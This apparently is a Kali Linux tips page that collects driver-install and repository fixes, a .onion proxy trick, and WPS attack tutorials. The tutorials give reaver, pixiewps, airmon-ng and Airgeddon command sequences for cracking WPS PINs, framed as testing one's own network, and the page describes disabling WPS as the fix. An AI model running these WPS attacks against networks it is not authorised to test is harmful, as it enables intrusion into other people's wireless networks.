Skip to content


Kali Linux / Backtrack Information, How-To’s, Tips, Tools, and Guides


Open a terminal

sudo apt-get update

sudo apt-get upgrade


Note your wireless adapters…if any are installed


Note the USB devices on the pi. You will not see the ALFA wifi device

Next type

sudo apt-get install realtek-rtl88xxau-dkms

Drivers will install, this may take a few minutes.

Once it is done type the following


You will now see the Realtek Adapter


You will now see your ALFA wireless card


While TOR is the recommended way to access the dark web, everyone and anyone can still visit without the same level of anonymity. I certainly would suggest using TOR always, however if you need to get to any .onion site from a computer without tor, you can do so by following this:

Open an internet browser (Edge, Firefox, Chrome, etc)
Type in the .onion site (ex. https://protonirockerxow.onion/rc/)
After the .onion portion of the address, add .dog (ex
Press Enter
You are now viewing RISEUP’s website on the darkweb, using a regular browser

Installing RX 480 Nitro Drivers in Kali

  • Kali

Navigating Around the Unsupported OS Issue for the AMD Drivers

On your Kali box, you will want to go to the AMD Driver download page for the RX 480 Cards

Once there you will want to download the UBUNTU Drivers

After the download completes, open a Terminal

Navigate to the directory where you downloaded the drivers and type


cd to the amd driver directory

nano amdgpu-pro-install

ctrl +w and search for ubuntu

After the ubuntu | linuxmint | debian text, insert | kali

So the line will look like
ubuntu | linuxmint | debian | kali

Save the file and exit

Type the following to install the drivers, and it should go through now. If you encounter any errors, you may need to repair and reinstall the drivers

./amdgpu-pro-install -y –opencl=legacy

KALI – Unable to Locate Package

  • Kali

How-To Ensure Your Repos Are Correct

sudo nano /etc/apt/sources.list

Add the following if they are not already in the file:

deb kali-rolling main non-free contrib
deb-src kali-rolling main non-free contrib

Save and Exit the File

sudo apt-get update

Your packages should now be available

Pixie Dust Attacks

Test and Secure YOUR Network Only

Run this from a linux box, against your network. Do not run this against any other network out there. It is easy to find the attacker, it is easy to prosecute the bad actor. Be very careful with this attack.

I would suggest installing Ubuntu, Kali, or ParrotOS and running from a USB drive, connected to your computer or laptop.

Open a termina

sudo bash

apt-get update
apt-get upgrade

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

git clone

cd reaver-wps-fork-t6x/
cd src/
make install

airmon-ng check kill
airmon-ng start wlan1

‘wash -i {monitor-interface}’

Identify your target (YOUR NETWORK ONLY) and note the name, bssid and channel. Make sure the signal is strong

reaver -i wlan1 -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Your attack is now running

How to Install AIRGEDDON

This info is specific to Linux only

Open a terminal

sudo bash

mkdir /tools & cd /tools

git clone

cd airgeddon


sudo bash


apt-get install and name of tool thats missing

After the dependencies are all installed, run ./ and begin the configuration

Select your wireless card

Put wireless card into monitoring mode

Select WPS attacks menu – option 8

Select option 4

Select 2.4 ghz

Testing and Securing Against a WPS Attack

How To Check If You Are Vulnerable, and Then Secure Your Network

First you will want to download and install reaver, wash and airmon-ng.  If you are running Kali or Parrot, it is already there.  You will also need a wireless adapter that is capable of packet injection.  Assuming you have those, you will want to open a terminal and run the following

sudo bash


Note which adapter is your wireless card, that is capable of packet injection.  For the rest of this, lets assume it is wlan0.

airmon-ng check kill

wash -i wlan0

Note the BSSID of your Wireless Access Point / Wireless Router

reaver -i wlan0 -b MacAddressOfMyRouter -vv 

After some time my router/ap gave up the ghost.  It showed my WPS pin.  I am running a wireless router with a Broadcom chip, which is susceptible.

To fix this, I had to log into my wireless router, navigate to the WPS settings, and I changed it from Enabled to Disabled.  I saved the settings, and voila…I haven’t been able to crack the WPS pin again